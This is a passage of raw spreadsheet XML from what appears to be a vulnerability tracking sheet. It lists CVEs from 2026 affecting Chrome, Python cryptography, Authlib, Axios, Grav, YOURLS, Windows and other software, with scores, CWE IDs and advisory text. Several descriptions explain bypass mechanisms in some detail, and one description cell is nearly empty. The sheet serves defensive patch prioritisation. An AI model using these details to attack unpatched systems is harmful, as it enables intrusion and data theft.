        </is>
      </c>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L555" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Storage in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87618</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87644</t>
        </is>
      </c>
      <c r="C556" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E556" s="5" t="inlineStr"/>
      <c r="F556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G556" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H556" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L556" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization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M556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87644</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87648</t>
        </is>
      </c>
      <c r="C557" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G557" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H557" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I557" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L557" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87648</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26007</t>
        </is>
      </c>
      <c r="C558" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E558" s="5" t="inlineStr"/>
      <c r="F558" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G558" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H558" s="5" t="inlineStr">
        <is>
          <t>cryptography.io:cryptography</t>
        </is>
      </c>
      <c r="I558" s="5" t="inlineStr">
        <is>
          <t>2026-02-10</t>
        </is>
      </c>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-354</t>
        </is>
      </c>
      <c r="L558" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor &gt; 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. This vulnerability is fixed in 46.0.5.</t>
        </is>
      </c>
      <c r="M558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26007</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28498</t>
        </is>
      </c>
      <c r="C559" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E559" s="5" t="inlineStr"/>
      <c r="F559" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G559" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H559" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I559" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr">
        <is>
          <t>CWE-325, CWE-354, CWE-573</t>
        </is>
      </c>
      <c r="L559" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28498</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41604</t>
        </is>
      </c>
      <c r="C560" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G560" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H560" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I560" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L560" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Read vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41604</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44487</t>
        </is>
      </c>
      <c r="C561" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G561" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H561" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I561" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44487</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47719</t>
        </is>
      </c>
      <c r="C562" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G562" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L562" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.2, the DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY Socket.IO handlers in server/runtime/index.js omit isSocketWriteAuthorized and accept attacker-controlled property.address or endpoint connection data. A remote unauthenticated attacker can make server/runtime/devices/httprequest/index.js call axios.get against arbitrary HTTP or HTTPS destinations, connect to reachable OPC UA or ODBC services, and receive results through the corresponding Socket.IO event. This read SSRF oracle can expose cloud instance metadata, internal administrative services, industrial endpoints, and ODBC data reachable from the FUXA host, including when secureEnabled is true. This issue is fixed in version 1.3.2.</t>
        </is>
      </c>
      <c r="M562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47719</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52767</t>
        </is>
      </c>
      <c r="C563" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E563" s="5" t="inlineStr"/>
      <c r="F563" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G563" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L563" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, HttpSignatureService::verifySignature() checks the result of PHP's openssl_verify() with a loose boolean negation - if (!openssl_verify(...)) { throw ... }. PHP's openssl_verify has four possible return values: 1, 0, -1, and "false". The -1 row is the bypass: PHP's truthiness rules make -1 a truthy value, so !(-1) === false, the throw is skipped, and the controller proceeds to processActivity(). Any condition that makes OpenSSL's EVP_VerifyFinal() return -1 triggers the bypass. The reachable consequence is the controller silently treats a failed verification as success and processes the attacker's payload. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53501</t>
        </is>
      </c>
      <c r="C564" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E564" s="5" t="inlineStr"/>
      <c r="F564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G564" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L564" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor’s HMAC validation can be bypassed due to the use of Python’s .replace() when removing the signature from the URL before validation. Since .replace() removes all occurrences of the substring, an attacker can insert the same signature multiple times in the URL and manipulate the final URL used for validation. This allows crafting URLs where the validated string differs from the actual requested resource, enabling loading images from unintended domains or paths. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53501</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53938</t>
        </is>
      </c>
      <c r="C565" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G565" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L565" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). Prior to version 0.6.2.5, cjose's JWE decryption path for the AES Key Wrap key-management algorithms (`alg` = `A128KW`, `A192KW`, `A256KW`) does not validate the length of the attacker-supplied `encrypted_key` (JWE Encrypted Key) before unwrapping it into a fixed-size, heap-allocated Content Encryption Key (CEK) buffer. A remote, unauthenticated attacker who can submit a crafted JWE to an application that decrypts it with an AES-KW symmetric key can trigger an out-of-bounds heap write, corrupting the heap. This leads at minimum to a crash (denial of service) and, depending on the heap layout and allocator, may be leverageable for further memory-corruption impact. `cjose_jwe_import()` / `cjose_jwe_decrypt()` are pre-authentication entry points: they parse and process fully attacker-controlled input. Upgrade to cjose 0.6.2.5 to receive a patch. If upgrading is not immediately possible, reject the AES Key Wrap algorithms (`A128KW`/`A192KW`/`A256KW`) for untrusted JWEs at the application layer.</t>
        </is>
      </c>
      <c r="M565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53938</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62673</t>
        </is>
      </c>
      <c r="C566" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G566" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L566" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.4, the Grav .htaccess and webserver-configs/htaccess.txt security rules omit the Apache [NC] flag and therefore compare sensitive directory and file-extension patterns case-sensitively. On a case-insensitive filesystem, an unauthenticated requester can use uppercase directory or extension variants to bypass the rules and retrieve files under user/accounts or user/config, including password hashes and security configuration. This issue is fixed in version 2.0.4.</t>
        </is>
      </c>
      <c r="M566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62673</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63135</t>
        </is>
      </c>
      <c r="C567" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G567" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L567" s="5" t="inlineStr">
        <is>
          <t>YOURLS is a self-hosted, customizable URL shortener written in PHP. From 1.5.1 until 1.10.4, YOURLS stores the HTTP Referer header through yourls_get_referrer(), yourls_sanitize_url_safe(), and yourls_log_redirect(), then aggregates the value in yourls-infos.php and passes the derived domain through yourls_get_domain(), yourls_stats_pie(), and yourls_google_array_to_data_table(). The chart builder concatenates labels into inline JavaScript without JavaScript-string escaping, so an unauthenticated attacker can poison the statistics of an existing short URL with a crafted referrer. When an administrator or public stats-page viewer opens the affected statistics page, attacker-controlled JavaScript executes in the YOURLS origin and can access admin-visible data, the API signature token, and privileged same-origin actions. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="M567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63135</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63376</t>
        </is>
      </c>
      <c r="C568" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G568" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L568" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63376</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63407</t>
        </is>
      </c>
      <c r="C569" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G569" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L569" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.0-rc.16, the Grav API plugin CorsMiddleware returns Access-Control-Allow-Origin: * and permissive OPTIONS responses for authenticated /api/v1 endpoints. JavaScript from any origin can submit an attacker-obtained JWT through the Authorization or X-API-Token header, read the authenticated response, and perform write operations with the token owner's privileges, enabling data exfiltration and account modification. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63407</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64380</t>
        </is>
      </c>
      <c r="C570" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G570" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H570" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I570" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: harden POSIX SID length parsing
posix_info_sid_size() reads sid[1] to obtain the subauthority count,
but its existing boundary check still accepts buffers with only one
remaining byte. Require two bytes before reading sid[1] so all client
paths that reuse the helper reject truncated POSIX SIDs safely.</t>
        </is>
      </c>
      <c r="M570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64380</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69247</t>
        </is>
      </c>
      <c r="C571" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G571" s="5" t="inlineStr">
        <is>
          <t>oracle, openssl, python</t>
        </is>
      </c>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-209</t>
        </is>
      </c>
      <c r="L571" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.</t>
        </is>
      </c>
      <c r="M571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69247</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69820</t>
        </is>
      </c>
      <c r="C572" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G572" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L572" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="C573" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G573" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L573" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="C574" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G574" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L574" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
